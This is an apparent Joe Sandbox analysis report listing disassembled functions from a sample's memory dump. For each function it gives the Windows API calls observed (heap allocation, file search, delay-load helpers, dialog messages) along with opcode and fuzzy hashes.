Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 70dfcd8d32e5dd682cff899379c6bc70cac99b9b19af471706f86a464a893892
Instruction ID: 513eff053bb14fd5d83889faffe26d3213da59d2c32b7c26c3005c9dcaee24f5
Opcode Fuzzy Hash: 70dfcd8d32e5dd682cff899379c6bc70cac99b9b19af471706f86a464a893892
Instruction Fuzzy Hash: 60F0E53B20121EAFEF118FA8FC00A9A77ADEF45B627144124FA05E71D0DB31DA64C790

Function 00A08E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A0CA2C,00000000,?,00A06CBE,?,00000008,?,00A091E0,?,?,?), ref: 00A08E38

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa73ebd371e35643415fcd4088d4daa796416b0caf491c12e539c56765b4d930
Instruction ID: 1769e6c9f9552a467d9e154ac1c652e12df996e35429fe5f90f9bf75ae8ee0d7
Opcode Fuzzy Hash: fa73ebd371e35643415fcd4088d4daa796416b0caf491c12e539c56765b4d930
Instruction Fuzzy Hash: 2EE0ED3160222D5AEAB12B61FD04B9F76689F82BB0F110120BC88960C1CF2CCC0182EC

Function 009E5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E5AC2

Part of subcall function 009EB505: __EH_prolog.LIBCMT ref: 009EB50A

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 769840672a373ce8b9297e9165b15b653119a5e8318803240f6f0b18fcc34b72
Instruction ID: ce70114683203e4cfff87c213e1c685be69e1b899ae10fa9db4c0e02bba55d4c
Opcode Fuzzy Hash: 769840672a373ce8b9297e9165b15b653119a5e8318803240f6f0b18fcc34b72
Instruction Fuzzy Hash: 87018C308106D8DAD725E7B8C0517EDFBA89FE4304F50858DA556A3383CBB41B08D7A2

Function 009EA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 009EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,009EA592,000000FF,?,?), ref: 009EA6C4
Part of subcall function 009EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,009EA592,000000FF,?,?), ref: 009EA6F2
Part of subcall function 009EA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,009EA592,000000FF,?,?), ref: 009EA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 009EA598

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 9d122a1731c8d70686166bccef97d48e1cc38b597d1110f90a0c6e70474652d2
Instruction ID: 51023f98502d066b34a0e974dc41a3e0e6f455e61ef57d64ab1d84e59fef81e9
Opcode Fuzzy Hash: 9d122a1731c8d70686166bccef97d48e1cc38b597d1110f90a0c6e70474652d2
Instruction Fuzzy Hash: 39F089310087D0AACB2357B589047CB7BD45F5A331F148A49F1FD521B6C67568959B23

Function 009F0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 009F0E3D

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: b924c2f2df57b9ce290a25a6a1962afc48a113ea9360e56dc2544ed0cd1b199f
Instruction ID: 75234fcc6c9316cb49edbaac99da9b804899b17d4729651a0ae5b5e366e98272
Opcode Fuzzy Hash: b924c2f2df57b9ce290a25a6a1962afc48a113ea9360e56dc2544ed0cd1b199f
Instruction Fuzzy Hash: AAD0C201A05098D6DF227329281A7FE2A0E8FE6311F0C0079B38D57187CA440C83A3A1

Function 009FA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 009FA62C

Part of subcall function 009FA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 009FA3DA

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 1080d97e13ac194e40c692721056983b64f2135361105f45a0887ae62a84d2f2
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: C8D0C7B521020DB6DF416B628C12A7E7999EB40340F148525BE45D5161EAB1DD109752

Function 009FE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 009FE5E3

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 3448a9cb32e053d1ac0fbe7c27f9d0ac3723fea73ac795e4dd4a81fca68168e1
Instruction ID: 5960c7c964f5327c2548c31a401978071cb1b53e466846c68cbf743b400ee845
Opcode Fuzzy Hash: 3448a9cb32e053d1ac0fbe7c27f9d0ac3723fea73ac795e4dd4a81fca68168e1
Instruction Fuzzy Hash: 31D0C9B85C03489ADA42FBE89C86B743658B3A5745F940501B345D64B1DA6544C2D705

Function 009FDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,009F1B3E), ref: 009FDD92

Part of subcall function 009FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009FB579
Part of subcall function 009FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009FB58A
Part of subcall function 009FB568: IsDialogMessageW.USER32(00010406,?), ref: 009FB59E
Part of subcall function 009FB568: TranslateMessage.USER32(?), ref: 009FB5AC
Part of subcall function 009FB568: DispatchMessageW.USER32(?), ref: 009FB5B6

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 344a5e6277611a21e21e6fb02c4e5c63863063a7a5497f2dad49a0c5018f2d4f
Instruction ID: 56800f47ac2654e9dd9a5000cf9099c678a5436090b1c0910378d9176543fa6f
Opcode Fuzzy Hash: 344a5e6277611a21e21e6fb02c4e5c63863063a7a5497f2dad49a0c5018f2d4f
Instruction Fuzzy Hash: 3ED09E36144300BBDA116B95CD06F1A7AA6ABD8B08F004554B384740B1C6769D22DB11

Function 009E98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,009E97BE), ref: 009E98C8

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 9b9e7c3740db8ccb99c45387aa72eeca3c455f851f91ee18f64f2d1f70681c49
Instruction ID: 8958f182478b882cdb5fb0820c8178a74636a5003b3a920edc0caca2a2562ad1
Opcode Fuzzy Hash: 9b9e7c3740db8ccb99c45387aa72eeca3c455f851f91ee18f64f2d1f70681c49
Instruction Fuzzy Hash: 4CC012344002858A8E228A2698480D9732AAB933A67B486D4C028890B1C322CC87EA02

Function 009FE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 40bac98f509b45f9a473acff2c85dbb0c862ea45927025c3e3cc0f538a91cdb0
Instruction ID: 3d56719294012506266313d3eedb03328a48cafaf465d3df5e940538cc6e652b
Opcode Fuzzy Hash: 40bac98f509b45f9a473acff2c85dbb0c862ea45927025c3e3cc0f538a91cdb0
Instruction Fuzzy Hash: 23B012DA3DC244BD3514214B1C02C37021DC0C1B303308D3EFE02C0490D840AC400531

Function 009FE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1e0e368765d4b3c962f71b0a7d84bb5d19278c0d0514efe46a4f78ff5963bd82
Instruction ID: e3b4b75d5f13a536e9242347a1ca39dd36dd0d950c726464bb70e2b5ef5f8b2b
Opcode Fuzzy Hash: 1e0e368765d4b3c962f71b0a7d84bb5d19278c0d0514efe46a4f78ff5963bd82
Instruction Fuzzy Hash: C0B012D63DD144BC3514660A1C02D37025DC0C1B30330C93EFD06C0190D840AC440631

Function 009FE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8912ba22f670b5935d1813e084a2328c8e9f429c6ab491adbf0e91aa2d2949d5
Instruction ID: 3cc87ca930205eb5e4f0449ce289de3f2c30dc51a409a2b68c929dab8b42f4bc
Opcode Fuzzy Hash: 8912ba22f670b5935d1813e084a2328c8e9f429c6ab491adbf0e91aa2d2949d5
Instruction Fuzzy Hash: BAB012DA3DC208BD3514614F1C02D37021DD0C0B30330493EFA06C0090D8406C400731

Function 009FE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bff82e161583cdfa13a4d948e675ce3b1e552b7fdb0767ca0a9fff570a5915d0
Instruction ID: 8a9e1103dd0c52eb6317ec80765c17017d4bb7f6c9db39d8b0ca604bb400374c
Opcode Fuzzy Hash: bff82e161583cdfa13a4d948e675ce3b1e552b7fdb0767ca0a9fff570a5915d0
Instruction Fuzzy Hash: 37B012E63DC104BC3514610A1D02D37429DC0C0B30330893EF906C0090DC406D410631

Function 009FEAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FEAF9

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ef8de7df3bb5df86f446b55b9473c89015444f1cbcea8e2b6853fa90074e4ff1
Instruction ID: 0c8e58ddf79f1845f3663d653c7484cb269a9c932066a01bab6301c8a0da79c0
Opcode Fuzzy Hash: ef8de7df3bb5df86f446b55b9473c89015444f1cbcea8e2b6853fa90074e4ff1
Instruction Fuzzy Hash: FFB012CB2EA1867C360472401D02C37011CD1C0BF0330992FF611C44A1DC804D410531

Function 009FE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 83c721435f87c796c39dbf921f767f51969f8b4048f6207af148849399aa295c
Instruction ID: db9b8f76255bb6371bf694eaa3655d7fc7af8037f4fbab659433bc25dbfb8ebc
Opcode Fuzzy Hash: 83c721435f87c796c39dbf921f767f51969f8b4048f6207af148849399aa295c
Instruction Fuzzy Hash: 09B012E63DC144BC3514610A1C02D37021DC0C1F303308A3EFD06C0090D840AD400631

Function 009FE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 83c4311ef72c30509b8262bfc5601efcf9393b28129470f41cdf13d49a88d2a2
Instruction ID: 5c13bcb1c08718236ae1fbf9d6b5364a85537b2ac351b672236f30f285eaa187
Opcode Fuzzy Hash: 83c4311ef72c30509b8262bfc5601efcf9393b28129470f41cdf13d49a88d2a2
Instruction Fuzzy Hash: 6DB012D63DD104BC3514620A1D02D37421DC0C0B30330893EF906C0190DC506D490631

Function 009FE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 754678b1ef46a080022d55fca13c20af88f87a6c847e4ec8f3b39437c77aa04a
Instruction ID: a3e384ab64d0dcc925410e79d573fb7ca7202a3e75c508eb39d4b86a47799b4a
Opcode Fuzzy Hash: 754678b1ef46a080022d55fca13c20af88f87a6c847e4ec8f3b39437c77aa04a
Instruction Fuzzy Hash: A4B012D63DD244BC3554620A1C02D37021DC0C0B303308E3EF906C0190D8406C840631

Function 009FE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

